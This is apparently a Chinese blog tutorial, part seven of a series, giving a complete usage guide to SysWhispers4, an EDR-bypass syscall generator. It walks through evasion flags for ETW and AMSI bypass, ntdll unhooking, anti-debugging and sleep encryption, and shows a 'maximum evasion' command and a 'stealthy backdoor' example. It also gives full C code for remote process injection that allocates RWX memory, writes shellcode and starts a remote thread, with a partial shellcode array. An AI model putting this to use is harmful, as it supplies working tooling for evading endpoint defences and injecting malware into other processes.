夜雨聆风
edr绕过工具 SysWhispers4 源码分析系列(七)
官网:http://securitytech.cc
七、SysWhispers4 完整使用指南
本文档提供 SysWhispers4 从环境搭建到实际应用的完整使用教程,包含详细的步骤说明、代码示例、编译配置和调试技巧。通过本文档,你将能够快速上手并在实际项目中使用 SysWhispers4。
1. 环境准备与安装
1.1 Python 环境要求
系统要求:
- Windows 10/11(推荐 22H2 或更新版本)
- Python 3.10 或更高版本
- 管理员权限(某些功能需要)
检查 Python 版本:
python --version# 应该显示:Python 3.10.x 或更高
如果版本过低,下载安装:
- 访问 https://www.python.org/downloads/
- 下载 Python 3.10+ 安装包
- 安装时勾选 “Add Python to PATH”
1.2 获取 SysWhispers4
方法 1:Git 克隆(推荐)
git clone https://github.com/CyberSecurityUP/SysWhispers4.gitcd SysWhispers4
方法 2:手动下载
# 1. 访问项目页面https://github.com/CyberSecurityUP/SysWhispers4# 2. 点击 "Code" → "Download ZIP"# 3. 解压到本地cd SysWhispers4-main
验证文件结构:
dir /s /b# 应该看到:# syswhispers.py - 主脚本# core\ - 核心模块目录# data\ - 数据文件目录# README.md - 项目文档
1.3 编译器环境
MSVC (Visual Studio) – 推荐
安装 Visual Studio 2019/2022:
- 下载 Visual Studio Installer
- 访问 https://visualstudio.microsoft.com/
- 下载 Community Edition(免费)
- 安装时选择工作负载:
- ✅ “使用 C++ 的桌面开发”
- ✅ Windows 10/11 SDK
- ✅ MSVC v142/v143 生成工具
- 验证安装:
cl# 应该显示 Microsoft (R) C/C++ Optimizing Compiler
配置环境变量:
REM 进入 VS 开发者命令提示符"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\VsDevCmd.bat"REM 或使用开始菜单:# Visual Studio 2022 → Developer Command Prompt for VS 2022
MinGW-w64(可选)
安装 MinGW:
- 下载 MinGW-w64
- 访问 https://www.mingw-w64.org/
- 或使用 MSYS2: https://www.msys2.org/
- 添加 MinGW 到 PATH:
# 编辑系统环境变量PATH=%PATH%;C:\msys64\mingw64\bin
- 验证安装:
g++--version# 应该显示 g++ (MinGW-w64) x.x.x
1.4 更新 SSN 表(可选)
为什么要更新?
- 获取最新 Windows 版本的 SSN
- 支持新发布的 Windows 版本
- 提高静态解析准确性
运行更新脚本:
cd SysWhispers4python scripts\update_syscall_table.py
手动更新(如果脚本失败):
# 1. 访问 j00ru 仓库https://github.com/j00ru/windows-syscalls# 2. 下载最新的 syscall 表# 3. 替换 data/syscalls_nt_x64.json
1.5 快速测试
运行帮助信息:
python syswhispers.py --help
预期输出:
usage: syswhispers.py [-h][-p PRESET][-f FUNCTIONS][-a ARCH][-c COMPILER][-m METHOD][-r RESOLVE][--obfuscate][--encrypt-ssn]...SysWhispers4-- NT syscall stub generator with advanced EDR evasionFunction selection (at least one required):-p,--preset common | injection | evasion | token | stealth |...-f,--functions Comma-separated list of NT function namesTarget:-a,--arch x64 (default)| x86 | wow64 | arm64-c,--compiler msvc (default)| mingw | clangTechniques:-m,--method embedded (default)| indirect | randomized | egg-r,--resolve freshycalls (default)|static| hells_gate |...Evasion/ obfuscation:--obfuscate Randomize stub ordering and inject junk instructions--encrypt-ssn XOR-encrypt SSN values at rest...
2. 生成指定 syscall 代码
2.1 使用预设(最简单)
预设列表:
|
|
|
|
|---|---|---|
common |
|
|
injection |
|
|
evasion |
|
|
token |
|
|
stealth |
|
|
file_ops |
|
|
transaction |
|
|
all |
|
|
示例 1:生成常见 syscall
python syswhispers.py --preset common
示例 2:生成注入相关 syscall
python syswhispers.py --preset injection
示例 3:组合多个预设
python syswhispers.py --preset common,injection
2.2 自定义函数列表
查看可用函数:
python syswhispers.py --list-functions
输出示例:
Available functions:NtAdjustPrivilegesTokenNtAllocateVirtualMemoryNtAllocateVirtualMemoryExNtAlertResumeThreadNtCreateThreadExNtOpenProcessNtWriteVirtualMemory...(共64个)
示例 1:单个函数
python syswhispers.py --functions NtAllocateVirtualMemory
示例 2:多个函数
python syswhispers.py --functions NtAllocateVirtualMemory,NtCreateThreadEx,NtWriteVirtualMemory
示例 3:预设 + 自定义
python syswhispers.py --preset common --functions NtQueryInformationProcess
2.3 选择技术选项
选择 SSN 解析方法
推荐选项:
# FreshyCalls(默认,Hook 免疫)python syswhispers.py --preset common --resolve freshycalls# Hell's Gate(快速,但怕 Hook)python syswhispers.py --preset common --resolve hells_gate# Halo's Gate(邻居扫描)python syswhispers.py --preset common --resolve halos_gate# Tartarus'Gate(增强版)python syswhispers.py --preset common --resolve tartarus# SyscallsFromDisk(最彻底)python syswhispers.py --preset common --resolve from_disk# RecycledGate(组合拳)python syswhispers.py --preset common --resolve recycled# HW Breakpoint(硬件断点)python syswhispers.py --preset common --resolve hw_breakpoint# Static(静态表,最快但不灵活)python syswhispers.py --preset common --resolve static
选择调用方式
# Embedded(直接 syscall,默认)python syswhispers.py --preset common --method embedded# Indirect(间接跳转,RIP 在 ntdll)python syswhispers.py --preset common --method indirect# Randomized(随机 gadget,反追踪)python syswhispers.py --preset common --method randomized# Egg(无静态特征)python syswhispers.py --preset common --method egg
2.4 启用规避技术
基础规避:
# 混淆(随机顺序 + 垃圾指令)python syswhispers.py --preset common --obfuscate# SSN 加密(XOR 加密静态 SSN)python syswhispers.py --preset common --encrypt-ssn# 栈伪造(合成调用栈)python syswhispers.py --preset common --stack-spoof
高级规避:
# ETW 绕过python syswhispers.py --preset common --etw-bypass# AMSI 绕过python syswhispers.py --preset common --amsi-bypass# ntdll 解钩python syswhispers.py --preset common --unhook-ntdll# 反调试python syswhispers.py --preset common --anti-debug# 睡眠加密python syswhispers.py --preset common --sleep-encrypt
最大规避模式:
python syswhispers.py --preset stealth \--method randomized --resolve recycled \--obfuscate --encrypt-ssn --stack-spoof \--etw-bypass --amsi-bypass --unhook-ntdll \--anti-debug --sleep-encrypt
2.5 架构和编译器选项
选择架构:
# x64(默认)python syswhispers.py --preset common --arch x64# x86(32 位)python syswhispers.py --preset common --arch x86# WoW64(32 位在 64 位系统)python syswhispers.py --preset common --arch wow64# ARM64(Windows on ARM)python syswhispers.py --preset common --arch arm64
选择编译器:
# MSVC/MASM(默认)python syswhispers.py --preset common --compiler msvc# MinGW/GASpython syswhispers.py --preset common --compiler mingw# Clang/GASpython syswhispers.py --preset common --compiler clang
2.6 自定义输出
修改前缀:
# 默认前缀:SW4_python syswhispers.py --preset common --prefix SW4# 自定义前缀:MY_python syswhispers.py --preset common --prefix MY# 无前缀python syswhispers.py --preset common --prefix ""
修改输出文件名:
# 默认:SW4Syscalls.*python syswhispers.py --preset common# 自定义:MySyscalls.*python syswhispers.py --preset common --out-file MySyscalls
修改输出目录:
# 当前目录(默认)python syswhispers.py --preset common# 指定目录python syswhispers.py --preset common --out-dir output\my_project
2.7 完整生成示例
示例 1:标准注入工具
python syswhispers.py --preset injection \--arch x64 --compiler msvc \--method embedded --resolve freshycalls \--prefix SW4 --out-file SW4Injection
生成文件:
SW4Injection_Types.hSW4Injection.hSW4Injection.cSW4Injection.asm
示例 2:隐蔽后门
python syswhispers.py --preset stealth \--method randomized --resolve recycled \--obfuscate --encrypt-ssn \--etw-bypass --amsi-bypass \--prefix BEACON --out-file BeaconSyscalls
示例 3:研究测试
python syswhispers.py --functions NtQueryInformationProcess,NtQuerySystemInformation \--resolve static --method embedded \--out-dir research\process_info
3. 编译生成的代码
3.1 MSVC 编译方法
命令行编译
步骤 1:打开开发者命令提示符
开始菜单→VisualStudio2022→DeveloperCommandPromptfor VS 2022
步骤 2:编译 ASM 文件
ml64 /c /Fo SW4Syscalls_asm.obj SW4Syscalls.asm
参数说明:
ml64– MASM x64 编译器/c– 只编译不链接/Fo– 指定输出文件名
步骤 3:编译 C 文件
cl /c /EHsc/Fo SW4Syscalls.obj SW4Syscalls.c
参数说明:
cl– MSVC C 编译器/c– 只编译不链接/EHsc– 启用 C++ 异常处理/Fo– 指定输出文件名
步骤 4:编译用户代码
cl /c /EHsc/Fo main.obj main.cpp
步骤 5:链接所有目标文件
link main.obj SW4Syscalls.obj SW4Syscalls_asm.obj \/OUT:program.exe
完整批处理脚本:
@echo offREM build_msvc.batREM 设置 VS 环境call "C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\VsDevCmd.bat"REM 编译汇编ml64 /c /Fo SW4Syscalls_asm.obj SW4Syscalls.asmif errorlevel 1exit/b 1REM 编译 Ccl /c /EHsc/Fo SW4Syscalls.obj SW4Syscalls.cif errorlevel 1exit/b 1REM 编译用户代码cl /c /EHsc/Fo main.obj main.cppif errorlevel 1exit/b 1REM 链接link main.obj SW4Syscalls.obj SW4Syscalls_asm.obj /OUT:program.exeif errorlevel 1exit/b 1echo Build successful!program.exe
Visual Studio 项目集成
步骤 1:创建新项目
File→New→Project→Visual C++→WindowsDesktop→WindowsDesktopApplication
步骤 2:添加生成的文件
SolutionExplorer→右键项目→Add→ExistingItem...选择:SW4Syscalls_Types.h, SW4Syscalls.h, SW4Syscalls.c, SW4Syscalls.asm
步骤 3:配置项目属性
C/C++ 配置:
ProjectProperties→ConfigurationProperties→ C/C++-General→AdditionalIncludeDirectories: $(ProjectDir)-Language→CompileAs:Compileas C Code(/TC)
链接器配置:
ProjectProperties→ConfigurationProperties→Linker-Input→AdditionalDependencies:添加.obj 文件
自定义生成步骤(用于 ASM):
ProjectProperties→ConfigurationProperties→BuildEvents→Pre-BuildEventCommandLine: ml64 /c /Fo"$(OutDir)SW4Syscalls_asm.obj""$(ProjectDir)SW4Syscalls.asm"
步骤 4:修改源代码
// main.cpp#include"SW4Syscalls.h"int main(){// 初始化if(!SW4_Initialize()){printf("Initialization failed\n");return1;}// 使用 syscall// ...return0;}
3.2 MinGW 编译方法
命令行编译
步骤 1:打开 MSYS2/MinGW 终端
msys2_shell.cmd -mingw64
步骤 2:编译所有文件
# 编译 SysWhispers4 生成的 C 文件(含内联汇编)g++-c -masm=intel -O2 SW4Syscalls.c -o SW4Syscalls.o# 编译用户代码g++-c -masm=intel -O2 main.cpp -o main.o# 链接g++ main.o SW4Syscalls.o -o program.exe -static
参数说明:
-masm=intel– 使用 Intel 语法内联汇编-O2– 优化级别 2-static– 静态链接(避免依赖 DLL)
完整编译脚本:
#!/bin/bash# build_mingw.shset-eecho "Compiling SysWhispers4 code..."g++-c -masm=intel -O2 SW4Syscalls.c -o SW4Syscalls.oecho "Compiling user code..."g++-c -masm=intel -O2 main.cpp -o main.oecho "Linking..."g++ main.o SW4Syscalls.o -o program.exe -staticecho "Build successful!"./program.exe
CMake 集成
CMakeLists.txt 示例:
cmake_minimum_required(VERSION 3.15)project(MySyscallProject)set(CMAKE_CXX_STANDARD 17)set(CMAKE_CXX_STANDARD_REQUIRED ON)# 添加 SysWhispers4 生成的文件set(SW4_SOURCESSW4Syscalls.cSW4Syscalls_stubs.c)# 设置编译选项set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -masm=intel")set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -masm=intel")# 创建可执行文件add_executable(program.exemain.cpp${SW4_SOURCES})# 链接必要的库target_link_libraries(program.exentapi # 如果需要 NT API)
编译命令:
mkdir buildcd buildcmake -G "MinGW Makefiles"..cmake --build .
3.3 Clang 编译方法
使用 Clang 编译:
# 编译clang-cl /c /EHsc/Fo SW4Syscalls.obj SW4Syscalls.cclang-cl /c /EHsc/Fo main.obj main.cpp# 链接(使用 lld-link)lld-link main.obj SW4Syscalls.obj /OUT:program.exe
3.4 常见问题解决
问题 1:找不到头文件
错误信息:
fatal error C1083:Cannot open include file:'windows.h':No such file or directory
解决方案:
REM 确保安装了Windows SDKREM 使用 VS DeveloperCommandPromptcall "C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\VsDevCmd.bat"
问题 2:链接错误 – 重复符号
错误信息:
error LNK2005: _SW4_Initialize already definedin SW4Syscalls.obj
解决方案:
- 检查是否重复添加了源文件
- 确保头文件有
#pragmaonce保护 - 清理并重新编译
del*.obj *.exebuild_msvc.bat
问题 3:MASM 语法错误
错误信息:
error A2070: invalid instruction operands
解决方案:
- 确保使用
ml64而不是ml(32 位) - 检查 ASM 文件编码(应该是 UTF-8 或 ANSI)
- 重新生成 SysWhispers4 代码
问题 4:MinGW 内联汇编错误
错误信息:
error: unexpected token in argument list
解决方案:
- 添加
-masm=intel标志 - 确保使用 GNU AS 语法
- 检查 SysWhispers4 生成时选择了
--compiler mingw
4. 在 C/C++ 项目中调用 syscall
4.1 基本调用模式
标准调用流程:
#include<windows.h>#include<stdio.h>#include"SW4Syscalls.h"int main(){// 步骤 1: 初始化(必须!)if(!SW4_Initialize()){printf("[!] Initialization failed\n");return1;}printf("[*] SysWhispers4 initialized\n");// 步骤 2: 调用 syscallNTSTATUS status;// 示例:查询进程信息PROCESS_BASIC_INFORMATION pbi ={0};ULONG returnLength =0;status = SW4_NtQueryInformationProcess(GetCurrentProcess(),ProcessBasicInformation,&pbi,sizeof(pbi),&returnLength);// 步骤 3: 检查返回值if(NT_SUCCESS(status)){printf("[*] NtQueryInformationProcess succeeded\n");printf(" PebBaseAddress: %p\n", pbi.PebBaseAddress);}else{printf("[!] NtQueryInformationProcess failed: 0x%08X\n", status);}return0;}
4.2 内存操作示例
分配可执行内存:
#include"SW4Syscalls.h"BOOL InjectShellcode(HANDLE hProcess, LPCVOID shellcode, SIZE_T size){PVOID remoteBase = NULL;SIZE_T regionSize = size;// 1. 分配内存NTSTATUS status = SW4_NtAllocateVirtualMemory(hProcess,&remoteBase,0,®ionSize,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!NT_SUCCESS(status)){printf("[!] NtAllocateVirtualMemory failed: 0x%08X\n", status);return FALSE;}printf("[+] Allocated memory at %p\n", remoteBase);// 2. 写入 shellcodestatus = SW4_NtWriteVirtualMemory(hProcess,remoteBase,(PVOID)shellcode,size,NULL);if(!NT_SUCCESS(status)){printf("[!] NtWriteVirtualMemory failed: 0x%08X\n", status);return FALSE;}printf("[+] Shellcode written\n");// 3. (可选)修改保护ULONG oldProtect;status = SW4_NtProtectVirtualMemory(hProcess,&remoteBase,®ionSize,PAGE_EXECUTE_READ,&oldProtect);return TRUE;}
4.3 进程注入示例
完整注入流程:
#include<windows.h>#include<stdio.h>#include"SW4Syscalls.h"// Shellcode 示例(弹出计算器)unsignedchar calc_shellcode[]="\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52""\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"// ... (省略,实际使用时替换为真实 shellcode);BOOL InjectToProcess(DWORD targetPid){HANDLE hProcess = NULL;HANDLE hThread = NULL;CLIENT_ID clientId ={0};OBJECT_ATTRIBUTES oa ={0};// 1. 打开目标进程InitializeObjectAttributes(&oa, NULL,0, NULL, NULL);clientId.UniqueProcess=(HANDLE)(ULONG_PTR)targetPid;NTSTATUS status = SW4_NtOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&oa,&clientId);if(!NT_SUCCESS(status)){printf("[!] NtOpenProcess failed: 0x%08X\n", status);return FALSE;}printf("[+] Opened process %d\n", targetPid);// 2. 分配内存PVOID baseAddress = NULL;SIZE_T size =sizeof(calc_shellcode);status = SW4_NtAllocateVirtualMemory(hProcess,&baseAddress,0,&size,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!NT_SUCCESS(status)){printf("[!] NtAllocateVirtualMemory failed: 0x%08X\n", status);SW4_NtClose(hProcess);return FALSE;}printf("[+] Allocated memory at %p\n", baseAddress);// 3. 写入 shellcodestatus = SW4_NtWriteVirtualMemory(hProcess,baseAddress,calc_shellcode,sizeof(calc_shellcode),NULL);if(!NT_SUCCESS(status)){printf("[!] NtWriteVirtualMemory failed: 0x%08X\n", status);SW4_NtClose(hProcess);return FALSE;}printf("[+] Shellcode written\n");// 4. 创建远程线程status = SW4_NtCreateThreadEx(&hThread,THREAD_ALL_ACCESS,NULL,hProcess,baseAddress,NULL,FALSE,0,0,0,NULL);if(!NT_SUCCESS(status)){printf("[!] NtCreateThreadEx failed: 0x%08X\n", status);SW4_NtClose(hProcess);return FALSE;}printf("[+] Remote thread created\n");// 5. 等待线程结束(可选)SW4_NtWaitForSingleObject(hThread, FALSE, NULL);// 6. 清理句柄SW4_NtClose(hThread);SW4_NtClose(hProcess);return TRUE;}int main(){// 初始化if(!SW4_Initialize()){printf("[!] Init failed\n");return1;}// 注入到记事本(PID 需要替换)if(InjectToProcess(1234)){printf("[+] Injection successful!\n");}else{printf("[-] Injection failed\n");}return0;}
4.4 信息查询示例
查询进程详细信息:
#include<windows.h>#include<stdio.h>#include"SW4Syscalls.h"voidQueryProcessInfo(HANDLE hProcess){NTSTATUS status;// 查询基本信息PROCESS_BASIC_INFORMATION pbi ={0};status = SW4_NtQueryInformationProcess(hProcess,ProcessBasicInformation,&pbi,sizeof(pbi),NULL);if(NT_SUCCESS(status)){printf("PEB Address: %p\n", pbi.PebBaseAddress);printf("Unique Process ID: %lu\n",(ULONG)(ULONG_PTR)pbi.UniqueProcessId);}// 查询映像文件名WCHAR imageName[MAX_PATH]={0};status = SW4_NtQueryInformationProcess(hProcess,ProcessImageFileName,imageName,sizeof(imageName),NULL);if(NT_SUCCESS(status)){printf("Image Name: %S\n", imageName);}// 查询命令行UNICODE_STRING cmdLine ={0};status = SW4_NtQueryInformationProcess(hProcess,ProcessCommandLineInformation,&cmdLine,sizeof(cmdLine),NULL);if(NT_SUCCESS(status)){printf("Command Line: %.*S\n", cmdLine.Length/2, cmdLine.Buffer);}}int main(){if(!SW4_Initialize())return1;// 查询自身进程QueryProcessInfo(GetCurrentProcess());return0;}
4.5 高级用法技巧
技巧 1:条件编译
#ifdef USE_DIRECT_SYSCALL#include"SW4Syscalls.h"#defineNtAllocateVirtualMemory SW4_NtAllocateVirtualMemory#defineNtWriteVirtualMemory SW4_NtWriteVirtualMemory#else// 使用 Win32 API#defineNtAllocateVirtualMemoryVirtualAlloc#defineNtWriteVirtualMemoryWriteProcessMemory#endifvoidMyFunction(){// 代码相同,根据宏选择实现NtAllocateVirtualMemory(...);}
技巧 2:封装为类
classSyscallWrapper{public:boolInitialize(){return SW4_Initialize()== TRUE;}PVOID AllocateMemory(HANDLE hProcess, SIZE_T size){PVOID base = NULL;NTSTATUS status = SW4_NtAllocateVirtualMemory(hProcess,&base,0,&size,MEM_COMMIT, PAGE_EXECUTE_READWRITE);return NT_SUCCESS(status)? base :nullptr;}boolWriteMemory(HANDLE hProcess, PVOID address, LPCVOID data, SIZE_T size){return NT_SUCCESS(SW4_NtWriteVirtualMemory(hProcess, address,(PVOID)data, size, NULL));}};// 使用SyscallWrapper sw;sw.Initialize();PVOID mem = sw.AllocateMemory(GetCurrentProcess(),0x1000);
技巧 3:错误处理宏
#define CHECK_NT_STATUS(status, msg) \if(!NT_SUCCESS(status)){ \printf("[!] %s failed: 0x%08X\n", msg, status); \goto cleanup; \}voidSafeOperation(){NTSTATUS status;status = SW4_NtAllocateVirtualMemory(...);CHECK_NT_STATUS(status,"NtAllocateVirtualMemory");status = SW4_NtWriteVirtualMemory(...);CHECK_NT_STATUS(status,"NtWriteVirtualMemory");// ...cleanup:// 清理资源}
5. 调试与验证 syscall 调用
5.1 基础调试方法
使用 printf 调试
#include<stdio.h>#include"SW4Syscalls.h"voidDebugTest(){printf("[*] Starting test...\n");if(!SW4_Initialize()){printf("[!] SW4_Initialize failed\n");return;}printf("[+] SW4_Initialize succeeded\n");PVOID base = NULL;SIZE_T size =0x1000;NTSTATUS status = SW4_NtAllocateVirtualMemory(GetCurrentProcess(),&base,0,&size,MEM_COMMIT,PAGE_READWRITE);printf("[*] NtAllocateVirtualMemory returned: 0x%08X\n", status);printf("[*] Base address: %p\n", base);if(NT_SUCCESS(status)){printf("[+] Memory allocated successfully\n");}else{printf("[-] Memory allocation failed\n");}}
使用 OutputDebugString
#include<windows.h>#define DEBUG_PRINT(fmt,...)do{ \char msg[512]; \snprintf(msg,sizeof(msg), fmt,##__VA_ARGS__); \OutputDebugStringA(msg); \}while(0)voidTestWithDebugString(){DEBUG_PRINT("[*] Test started\n");if(!SW4_Initialize()){DEBUG_PRINT("[!] Init failed\n");return;}DEBUG_PRINT("[+] Init succeeded\n");}
5.2 WinDbg 调试
附加到进程
0:000>!process 00 program.exePROCESS ffff8a0012345080SessionId:1Cid:1234Peb:0000000012345000Image: program.exe0:000>.process /r /p ffff8a0012345080Implicit process is now ffff8a0012345080
设置断点
0:000> bp program!main0:000> bp program!SW4_Initialize0:000> bp program!SW4_NtAllocateVirtualMemory
查看调用栈
0:000> k# Child-SP RetAddr00000000e1`23456780 00007ff7`12345678 program!SW4_NtAllocateVirtualMemory01000000e1`23456788 00007ff7`12345680 program!main02000000e1`23456790 00007ff8`56789abc kernel32!BaseThreadInitThunk03000000e1`23456798 00007ff8`6789abcd ntdll!RtlUserThreadStart
查看寄存器
0:000> rrax=0000000000000000 rbx=0000000000000000rcx=00000000000004bc rdx=001234567890abcdr8=0000000000000000 r9=001234567890dcbarip=00007ff7`12345678 program!SW4_NtAllocateVirtualMemory0:000> r eaxeax=00000018 ; SSN = 24
单步执行
0:000> t ;Trace(step into)0:000> p ;Proceed(step over)0:000> g ;Go(continue execution)
查看内存
0:000> dq @rsp L8 ;查看栈上8个 QWORD0:000> db @rcx L100 ;查看 RCX 指向的100字节0:000> dps @r10 L10 ;查看 R10 指向的指针
查看反汇编
0:000> u program!SW4_NtAllocateVirtualMemory L15program!SW4_NtAllocateVirtualMemory:00007ff7`12345678 4c8bd9 mov r10,rcx00007ff7`1234567b b818000000 mov eax,18h00007ff7`12345680 0f05 syscall00007ff7`12345682 c3 ret
5.3 验证 syscall 执行
方法 1:使用 Process Monitor
- 下载 Process Monitor (ProcMon)
- 运行 ProcMon,设置过滤器:
- Process Name → is → program.exe → Add
- 运行程序,观察 syscall 活动
- 应该看到大量 Native API 调用
方法 2:使用 API Monitor
- 下载 API Monitor (rohitab.com)
- 选择要监控的 API:
- Native API → Process Functions
- Native API → Memory Functions
- 启动程序,监控 API 调用
- 验证没有 Win32 API 调用(只有 Native API)
方法 3:使用 ETW 分析
# 启用 syscall ETW 提供者logman create trace sysmon -o sysmon.etl -p "Microsoft-Windows-Sysmon"0xffffffff0xff-ets# 运行程序.\program.exe# 停止跟踪logman stop sysmon# 转换为 XMLtracerpt sysmon.etl -o sysmon.xml# 分析 XML 中的 syscall 事件
5.4 性能分析
测量 syscall 耗时
#include<chrono>#include<stdio.h>doubleMeasureSyscall(DWORD iterations){auto start = std::chrono::high_resolution_clock::now();for(DWORD i =0; i < iterations; i++){LARGE_INTEGER delay ={-1};SW4_NtDelayExecution(FALSE,&delay);}auto end = std::chrono::high_resolution_clock::now();std::chrono::duration<double, std::milli> elapsed = end - start;return elapsed.count()/ iterations;}int main(){if(!SW4_Initialize())return1;double avgTime =MeasureSyscall(1000);printf("Average syscall time: %.3f ms\n", avgTime);return0;}
对比 Win32 API vs Direct Syscall
voidComparePerformance(){constint ITERATIONS =10000;// Win32 APIauto start1 = std::chrono::high_resolution_clock::now();for(int i =0; i < ITERATIONS; i++){Sleep(0);}auto end1 = std::chrono::high_resolution_clock::now();// Direct Syscallauto start2 = std::chrono::high_resolution_clock::now();for(int i =0; i < ITERATIONS; i++){LARGE_INTEGER delay ={0};SW4_NtDelayExecution(FALSE,&delay);}auto end2 = std::chrono::high_resolution_clock::now();auto time1 = std::chrono::duration_cast<std::chrono::microseconds>(end1 - start1).count();auto time2 = std::chrono::duration_cast<std::chrono::microseconds>(end2 - start2).count();printf("Win32 Sleep: %lu µs (%.2f µs/call)\n", time1,(double)time1/ITERATIONS);printf("Direct Syscall: %lu µs (%.2f µs/call)\n", time2,(double)time2/ITERATIONS);printf("Speedup: %.2fx\n",(double)time1/time2);}
5.5 常见问题排查
问题 1:Initialize() 失败
症状:
[!]Initialization failed
排查步骤:
// 添加详细错误信息BOOL result = SW4_Initialize();printf("SW4_Initialize returned: %d\n", result);if(!result){DWORD error =GetLastError();printf("GetLastError: %lu\n", error);}
可能原因:
- ntdll 导出表损坏
- PEB 遍历失败
- FreshyCalls 排序算法错误
解决方案:
- 尝试其他解析方法:
--resolve hells_gate - 使用静态表:
--resolvestatic - 检查系统完整性
问题 2:syscall 返回 STATUSINVALIDPARAMETER
症状:
[!]NtAllocateVirtualMemory failed:0xC00000EF
排查步骤:
// 检查参数printf("ProcessHandle: %p\n", hProcess);printf("BaseAddress: %p\n",&base);printf("RegionSize: %zu\n", size);
常见错误:
- 传递了无效的句柄
- 地址未对齐
- 大小超出限制
问题 3:程序崩溃
症状:
Access violation - code c0000005
排查步骤:
// 添加异常处理__try {status = SW4_NtAllocateVirtualMemory(...);} __except(EXCEPTION_EXECUTE_HANDLER){printf("Exception occurred: 0x%08X\n",GetExceptionCode());}
可能原因:
- 栈未对齐(16 字节)
- 参数类型错误
- 使用了已释放的内存
总结
通过本章的学习,你应该能够:
✅ 环境搭建:正确安装 Python、编译器、SDK✅ 代码生成:根据需求生成合适的 syscall 代码✅ 编译集成:将生成的代码集成到 MSVC/MinGW 项目✅ 实际调用:在 C/C++ 项目中正确使用 syscall✅ 调试验证:使用各种工具调试和验证 syscall 执行
记住以下最佳实践:
- 始终调用 Initialize():在任何 syscall 之前
- 检查返回值:使用 NT_SUCCESS 判断成功
- 清理资源:使用 NtClose 关闭句柄
- 错误处理:添加适当的异常处理
- 调试优先:先在调试环境下测试
SysWhispers4 是一个强大的工具,但要充分发挥其威力,需要深入理解 Windows Internals 和系统调用机制。继续学习前面的章节,你会变得更强大!
-
公众号:安全狗的自我修养
-
vx:2207344074
-
http://gitee.com/haidragon
-
http://github.com/haidragon
-
bilibili:haidragonx
-
